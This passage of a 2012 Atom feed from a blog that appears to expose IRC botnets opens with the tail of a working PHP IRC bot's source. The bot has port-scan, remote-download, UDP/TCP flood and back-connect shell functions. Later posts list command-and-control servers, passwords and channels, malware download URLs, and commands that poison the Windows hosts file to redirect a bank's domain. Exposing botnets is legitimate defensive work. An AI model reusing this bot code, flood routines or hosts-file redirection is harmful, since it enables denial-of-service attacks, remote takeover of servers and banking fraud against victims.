6667&lt;br /&gt;                               if(count($mcmd) &amp;gt; 2)&lt;br /&gt;                               {&lt;br /&gt;                                  if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2pscan\2]: &amp;quot;.$mcmd[1].&amp;quot;:&amp;quot;.$mcmd[2].&amp;quot; is \2open\2&amp;quot;);&lt;br /&gt;                                  else&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2pscan\2]: &amp;quot;.$mcmd[1].&amp;quot;:&amp;quot;.$mcmd[2].&amp;quot; is \2closed\2&amp;quot;);&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;ud.server&amp;quot;: // .ud.server &amp;lt;server&amp;gt; &amp;lt;port&amp;gt; [password]&lt;br /&gt;                               if(count($mcmd)&amp;gt;2)&lt;br /&gt;                               {&lt;br /&gt;                                  $this-&amp;gt;config['server'] = $mcmd[1];&lt;br /&gt;                                  $this-&amp;gt;config['port'] = $mcmd[2];&lt;br /&gt;                                  if(isset($mcmcd[3]))&lt;br /&gt;                                  {&lt;br /&gt;                                   $this-&amp;gt;config['pass'] = $mcmd[3];&lt;br /&gt;                                   $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2update\2]: Server trocado para &amp;quot;.$mcmd[1].&amp;quot;:&amp;quot;.$mcmd[2].&amp;quot; Senha: &amp;quot;.$mcmd[3]);&lt;br /&gt;                                  }&lt;br /&gt;                                  else&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2update\2]: Server trocado para &amp;quot;.$mcmd[1].&amp;quot;:&amp;quot;.$mcmd[2]);&lt;br /&gt;                                  }&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;download&amp;quot;:&lt;br /&gt;                               if(count($mcmd) &amp;gt; 2)&lt;br /&gt;                               {&lt;br /&gt;                                  if(!$fp = fopen($mcmd[2],&amp;quot;w&amp;quot;))&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2download\2]: Nao foi possivel fazer o download. Permissao negada.&amp;quot;);&lt;br /&gt;                                  }&lt;br /&gt;                                  else&lt;br /&gt;                                  {&lt;br /&gt;                                     if(!$get = file($mcmd[1]))&lt;br /&gt;                                     {&lt;br /&gt;                                        $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2download\2]: Nao foi possivel fazer o download de \2&amp;quot;.$mcmd[1].&amp;quot;\2&amp;quot;);&lt;br /&gt;                                     }&lt;br /&gt;                                     else&lt;br /&gt;                                     {&lt;br /&gt;                                        for($i=0;$i&amp;lt;=count($get);$i++)&lt;br /&gt;                                        {&lt;br /&gt;                                           fwrite($fp,$get[$i]);&lt;br /&gt;                                        }&lt;br /&gt;                                        $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2download\2]: Arquivo \2&amp;quot;.$mcmd[1].&amp;quot;\2 baixado para \2&amp;quot;.$mcmd[2].&amp;quot;\2&amp;quot;);&lt;br /&gt;                                     }&lt;br /&gt;                                     fclose($fp);&lt;br /&gt;                                  }&lt;br /&gt;                               }&lt;br /&gt;                               else { $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2download\2]: use .download http://your.host/file /tmp/file&amp;quot;); }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;die&amp;quot;:&lt;br /&gt;                               $this-&amp;gt;send(&amp;quot;QUIT :die command from $nick&amp;quot;);&lt;br /&gt;                               fclose($this-&amp;gt;conn);&lt;br /&gt;                               exit;&lt;br /&gt;                            case &amp;quot;logout&amp;quot;:&lt;br /&gt;                               $this-&amp;gt;log_out($host);&lt;br /&gt;                               $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2auth\2]: $nick deslogado!&amp;quot;);&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;udpflood&amp;quot;:&lt;br /&gt;                               if(count($mcmd)&amp;gt;3)&lt;br /&gt;                               {&lt;br /&gt;                                  $this-&amp;gt;udpflood($mcmd[1],$mcmd[2],$mcmd[3]);&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;tcpflood&amp;quot;:&lt;br /&gt;                               if(count($mcmd)&amp;gt;5)&lt;br /&gt;                               {&lt;br /&gt;                                  $this-&amp;gt;tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                         }&lt;br /&gt;                      }&lt;br /&gt;                   }&lt;br /&gt;                break;&lt;br /&gt;             }&lt;br /&gt;          }&lt;br /&gt;       }&lt;br /&gt;       $old_buf = $this-&amp;gt;buf;&lt;br /&gt;    }&lt;br /&gt;    $this-&amp;gt;start();&lt;br /&gt; }&lt;br /&gt; function send($msg)&lt;br /&gt; {&lt;br /&gt;    fwrite($this-&amp;gt;conn,&amp;quot;$msg\r\n&amp;quot;);&lt;br /&gt;&lt;br /&gt; }&lt;br /&gt; function join($chan,$key=NULL)&lt;br /&gt; {&lt;br /&gt;    $this-&amp;gt;send(&amp;quot;JOIN $chan $key&amp;quot;);&lt;br /&gt; }&lt;br /&gt; function privmsg($to,$msg)&lt;br /&gt; {&lt;br /&gt;    $this-&amp;gt;send(&amp;quot;PRIVMSG $to :$msg&amp;quot;);&lt;br /&gt; }&lt;br /&gt; function notice($to,$msg)&lt;br /&gt; {&lt;br /&gt;    $this-&amp;gt;send(&amp;quot;NOTICE $to :$msg&amp;quot;);&lt;br /&gt; }&lt;br /&gt; function is_logged_in($host)&lt;br /&gt; {&lt;br /&gt;    if(isset($this-&amp;gt;users[$host]))&lt;br /&gt;       return 1;&lt;br /&gt;    else&lt;br /&gt;       return 0;&lt;br /&gt; }&lt;br /&gt; function log_in($host)&lt;br /&gt; {&lt;br /&gt;    $this-&amp;gt;users[$host] = true;&lt;br /&gt; }&lt;br /&gt; function log_out($host)&lt;br /&gt; {&lt;br /&gt;    unset($this-&amp;gt;users[$host]);&lt;br /&gt; }&lt;br /&gt; function set_nick()&lt;br /&gt; {&lt;br /&gt;    if(isset($_SERVER['SERVER_SOFTWARE']))&lt;br /&gt;    {&lt;br /&gt;       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),&amp;quot;apache&amp;quot;))&lt;br /&gt;          $this-&amp;gt;nick = &amp;quot;[A]&amp;quot;;&lt;br /&gt;       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),&amp;quot;iis&amp;quot;))&lt;br /&gt;          $this-&amp;gt;nick = &amp;quot;[I]&amp;quot;;&lt;br /&gt;       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),&amp;quot;xitami&amp;quot;))&lt;br /&gt;          $this-&amp;gt;nick = &amp;quot;[X]&amp;quot;;&lt;br /&gt;       else&lt;br /&gt;          $this-&amp;gt;nick = &amp;quot;[U]&amp;quot;;&lt;br /&gt;    }&lt;br /&gt;    else&lt;br /&gt;    {&lt;br /&gt;       $this-&amp;gt;nick = &amp;quot;[C]&amp;quot;;&lt;br /&gt;    }&lt;br /&gt;    $this-&amp;gt;nick .= $this-&amp;gt;config['prefix'];&lt;br /&gt;    for($i=0;$i&amp;lt;$this-&amp;gt;config['maxrand'];$i++)&lt;br /&gt;       $this-&amp;gt;nick .= mt_rand(0,9);&lt;br /&gt;    $this-&amp;gt;send(&amp;quot;NICK &amp;quot;.$this-&amp;gt;nick);&lt;br /&gt; }&lt;br /&gt;  function udpflood($host,$packetsize,$time) {&lt;br /&gt;        $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2UdpFlood Started!\2]&amp;quot;);&lt;br /&gt;        $packet = &amp;quot;&amp;quot;;&lt;br /&gt;        for($i=0;$i&amp;lt;$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }&lt;br /&gt;        $timei = time();&lt;br /&gt;        $i = 0;&lt;br /&gt;        while(time()-$timei &amp;lt; $time) {&lt;br /&gt;                $fp=fsockopen(&amp;quot;udp://&amp;quot;.$host,mt_rand(0,6000),$e,$s,5);&lt;br /&gt;        fwrite($fp,$packet);&lt;br /&gt;        fclose($fp);&lt;br /&gt;                $i++;&lt;br /&gt;        }&lt;br /&gt;        $env = $i * $packetsize;&lt;br /&gt;        $env = $env / 1048576;&lt;br /&gt;        $vel = $env / $time;&lt;br /&gt;        $vel = round($vel);&lt;br /&gt;        $env = round($env);&lt;br /&gt;        $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s &amp;quot;);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt; function tcpflood($host,$packets,$packetsize,$port,$delay)&lt;br /&gt; {&lt;br /&gt;    $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2TcpFlood Started!\2]&amp;quot;);&lt;br /&gt;    $packet = &amp;quot;&amp;quot;;&lt;br /&gt;    for($i=0;$i&amp;lt;$packetsize;$i++)&lt;br /&gt;       $packet .= chr(mt_rand(1,256));&lt;br /&gt;    for($i=0;$i&amp;lt;$packets;$i++)&lt;br /&gt;    {&lt;br /&gt;       if(!$fp=fsockopen(&amp;quot;tcp://&amp;quot;.$host,$port,$e,$s,5))&lt;br /&gt;       {&lt;br /&gt;          $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2TcpFlood\2]: Error: &amp;lt;$e&amp;gt;&amp;quot;);&lt;br /&gt;          return 0;&lt;br /&gt;       }&lt;br /&gt;       else&lt;br /&gt;       {&lt;br /&gt;          fwrite($fp,$packet);&lt;br /&gt;          fclose($fp);&lt;br /&gt;       }&lt;br /&gt;       sleep($delay);&lt;br /&gt;    }&lt;br /&gt;    $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.&amp;quot;);&lt;br /&gt; }&lt;br /&gt; function conback($ip,$port)&lt;br /&gt; {&lt;br /&gt;    $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2conback\2]: tentando conectando a $ip:$port&amp;quot;);&lt;br /&gt;    $dc_source = &amp;quot;&amp;quot;;&lt;br /&gt;    if (is_writable(&amp;quot;/tmp&amp;quot;))&lt;br /&gt;    {&lt;br /&gt;      if (file_exists(&amp;quot;/tmp/dc.pl&amp;quot;)) { unlink(&amp;quot;/tmp/dc.pl&amp;quot;); }&lt;br /&gt;      $fp=fopen(&amp;quot;/tmp/dc.pl&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;      fwrite($fp,base64_decode($dc_source));&lt;br /&gt;      passthru(&amp;quot;perl /tmp/dc.pl $ip $port &amp;amp;&amp;quot;);&lt;br /&gt;      unlink(&amp;quot;/tmp/dc.pl&amp;quot;);&lt;br /&gt;    }&lt;br /&gt;    else&lt;br /&gt;    {&lt;br /&gt;    if (is_writable(&amp;quot;/var/tmp&amp;quot;))&lt;br /&gt;    {&lt;br /&gt;      if (file_exists(&amp;quot;/var/tmp/dc.pl&amp;quot;)) { unlink(&amp;quot;/var/tmp/dc.pl&amp;quot;); }&lt;br /&gt;      $fp=fopen(&amp;quot;/var/tmp/dc.pl&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;      fwrite($fp,base64_decode($dc_source));&lt;br /&gt;      passthru(&amp;quot;perl /var/tmp/dc.pl $ip $port &amp;amp;&amp;quot;);&lt;br /&gt;      unlink(&amp;quot;/var/tmp/dc.pl&amp;quot;);&lt;br /&gt;    }&lt;br /&gt;    if (is_writable(&amp;quot;.&amp;quot;))&lt;br /&gt;    {&lt;br /&gt;      if (file_exists(&amp;quot;dc.pl&amp;quot;)) { unlink(&amp;quot;dc.pl&amp;quot;); }&lt;br /&gt;      $fp=fopen(&amp;quot;dc.pl&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;      fwrite($fp,base64_decode($dc_source));&lt;br /&gt;      passthru(&amp;quot;perl dc.pl $ip $port &amp;amp;&amp;quot;);&lt;br /&gt;      unlink(&amp;quot;dc.pl&amp;quot;);&lt;br /&gt;    }&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;$bot = new pBot;&lt;br /&gt;$bot-&amp;gt;start();&lt;br /&gt;&lt;br /&gt;?&amp;gt; &lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/83.170.89.35&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1073433847202779168?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1073433847202779168/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/831708935linux-bots-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1073433847202779168'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1073433847202779168'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/831708935linux-bots-hosted-in-united.html' title='83.170.89.35(linux bots hosted in United Kingdom London Uk2 - Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4547593606373546493</id><published>2012-01-22T17:55:00.002+01:00</published><updated>2012-01-22T17:55:52.237+01:00</updated><title type='text'>94.102.0.165(ngrBot hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;94.102.0.165 4444 PASS pas217&lt;br /&gt;&lt;br /&gt;JOIN #voLwy vol323&lt;br /&gt;PONG :HTTP1.4&lt;br /&gt;NICK n{US|XP-32a}mwwaozy&lt;br /&gt;USER mwwaozy 0 * :mwwaozy&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/94.102.0.165&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4547593606373546493?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4547593606373546493/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/941020165ngrbot-hosted-in-turkey.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4547593606373546493'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4547593606373546493'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/941020165ngrbot-hosted-in-turkey.html' title='94.102.0.165(ngrBot hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1878290165395918001</id><published>2012-01-20T19:57:00.001+01:00</published><updated>2012-01-25T23:59:35.839+01:00</updated><title type='text'>lalorlz1.info(ngrBot hosted in Germany Weinstadt Hetzner Online Ag)</title><content type='html'>Resolved : [lalorlz1.info] To [88.198.181.16]&lt;br /&gt;Resolved : [lalorlz1.info] To [176.9.192.216]&lt;br /&gt;&lt;br /&gt;C&amp;C Server: 88.198.181.16:5236&lt;br /&gt;Server Password: &lt;br /&gt;Username: raecpnp&lt;br /&gt;Nickname: n{DE|XPa}raecpnp&lt;br /&gt;Channel: #ROCK (Password: ngrBot) &lt;br /&gt;Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/88.198.181.16&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1878290165395918001?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1878290165395918001/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/lalorlz1infongrbot-hosted-in-germany.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1878290165395918001'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1878290165395918001'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/lalorlz1infongrbot-hosted-in-germany.html' title='lalorlz1.info(ngrBot hosted in Germany Weinstadt Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5769494357577031169</id><published>2012-01-20T19:15:00.000+01:00</published><updated>2012-01-20T19:15:27.949+01:00</updated><title type='text'>93.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)</title><content type='html'>Remote Host Port Number&lt;br /&gt;93.95.99.87 1866&lt;br /&gt;&lt;br /&gt;NICK n[USA|XP|COMPUTERNAME]pxzflri&lt;br /&gt;USER hh "" "lol" :hh&lt;br /&gt;&lt;br /&gt;Now talking in #!h!&lt;br /&gt;Modes On: [ #!h! ] [ +smntu ]&lt;br /&gt;&lt;br /&gt;.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/93.95.99.87&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5769494357577031169?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5769494357577031169/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/93959987irc-botnet-hosted-in-russian.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5769494357577031169'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5769494357577031169'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/93959987irc-botnet-hosted-in-russian.html' title='93.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3619072078099727332</id><published>2012-01-18T19:41:00.001+01:00</published><updated>2012-01-18T19:47:14.163+01:00</updated><title type='text'>irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;irc.r00t.me.uk 7007&lt;br /&gt;&lt;br /&gt;PASS gBot&lt;br /&gt;NICK n{USA|XP}eqqcbip&lt;br /&gt;USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip&lt;br /&gt;&lt;br /&gt;i dont have the exe to find more infos so try to find chanels your self&lt;br /&gt;this botnet is from same guy here:http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/193.107.16.113&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3619072078099727332?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3619072078099727332/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/ircr00tmeukgbot-hosted-in-seychelles.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3619072078099727332'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3619072078099727332'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/ircr00tmeukgbot-hosted-in-seychelles.html' title='irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1993586297622524094</id><published>2012-01-18T17:53:00.000+01:00</published><updated>2012-01-18T17:53:11.725+01:00</updated><title type='text'>60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;70.38.98.236 80&lt;br /&gt;70.38.98.237 80&lt;br /&gt;60.190.223.42 5101 PASS hax0r&lt;br /&gt;&lt;br /&gt;PRIVMSG #US! :[d="http://img102.herosh.com/2012/01/14/551459105.gif" s="65536 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0&lt;br /&gt;PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/14/594572320.gif" s="61440 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" - Download retries: 0&lt;br /&gt;PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/04/210592960.gif" s="27648 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\3.tmp" - Download retries: 0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PASS hax0r&lt;br /&gt;KCIK n{US|XPa}utqszd&lt;br /&gt;#ngme ng00&lt;br /&gt;#new&lt;br /&gt;#+,#p-  #U&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/60.190.223.42&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1993586297622524094?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1993586297622524094/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/6019022342irc-botnet-hosted-in-china.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1993586297622524094'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1993586297622524094'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/6019022342irc-botnet-hosted-in-china.html' title='60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6813710523616978043</id><published>2012-01-17T22:41:00.001+01:00</published><updated>2012-01-20T20:18:47.169+01:00</updated><title type='text'>union-foros.com(irc botnet hosted in Seychelles Ideal Solution Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;193.107.19.60 1863&lt;br /&gt;&lt;br /&gt;NICK {XP\USA\919273}&lt;br /&gt;JOIN #per&lt;br /&gt;PRIVMSG #per :&lt;br /&gt;14,1.&lt;br /&gt;15:: [HOST]&lt;br /&gt;adido Host:&lt;br /&gt;3,1 echo 69.64.58.90 www.viabcp.com &gt;&gt; %windir%\system32\drivers\etc\hosts&lt;br /&gt;3,1 echo 69.64.58.90 viabcp.com &gt;&gt; %windir%\system32\drivers\etc\hosts&lt;br /&gt;USER COMPUTERNAME * 0 :COMPUTERNAME&lt;br /&gt;MODE {XP\USA\919273} -ix&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now talking in #per&lt;br /&gt;Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ]&lt;br /&gt;Topic By: [ ronaldo ]&lt;br /&gt;{WIN7\PER\710210}) ,1.:: [HOST] Añadido Host: 3,1 echo 69.64.58.90 www.viabcp.com &gt;&gt; %windir%\system32\drivers\etc\hosts ::&lt;br /&gt;{WIN7\PER\710210}) ,1.:: [HOST] Añadido Host: 3,1 echo 69.64.58.90 viabcp.com &gt;&gt; %windir%\system32\drivers\etc\hosts ::&lt;br /&gt;({2K\ESP\215304}) ,1.:: [HOST] Añadido Host: 3,1 echo 69.64.58.90 www.viabcp.com &gt;&gt; %windir%\system32\drivers\etc\hosts ::&lt;br /&gt;{2K\ESP\215304}) ,1.:: [HOST] 11Añadido Host: 3,1 echo 69.64.58.90 viabcp.com &gt;&gt; %windir%\system32\drivers\etc\hosts ::&lt;br /&gt;{WIN7\PER\710210}) ,1.:: iMBot 6--» [USB] Unidad extraible infestada 3,1 H: ::.&lt;br /&gt;&lt;br /&gt;C&amp;C Server: 193.107.19.60:1863&lt;br /&gt; Server Password: &lt;br /&gt; Username: DELL-D3E62F7E26&lt;br /&gt; Nickname: {XP\DEU\500799}&lt;br /&gt; Channel: #per1 (Password: ) &lt;br /&gt; Channeltopic:&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/193.107.19.60&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6813710523616978043?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6813710523616978043/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/1931071960irc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6813710523616978043'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6813710523616978043'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/1931071960irc-botnet-hosted-in.html' title='union-foros.com(irc botnet hosted in Seychelles Ideal Solution Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6183406053528500643</id><published>2012-01-17T21:24:00.005+01:00</published><updated>2012-01-18T23:41:23.587+01:00</updated><title type='text'>d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )</title><content type='html'>This NgrBotnet conect to 3 domains and is aproximatly 100k:&lt;br /&gt;Resolved : [d.xludakx.com] To [95.211.165.62]&lt;br /&gt;Resolved : [ab.0n3mmm.com] To [95.211.165.62]&lt;br /&gt;Resolved : [ab.0n3mmm.com] To [178.33.143.52]&lt;br /&gt;Resolved : [ab.0n3mmm.com] To [109.75.176.231]&lt;br 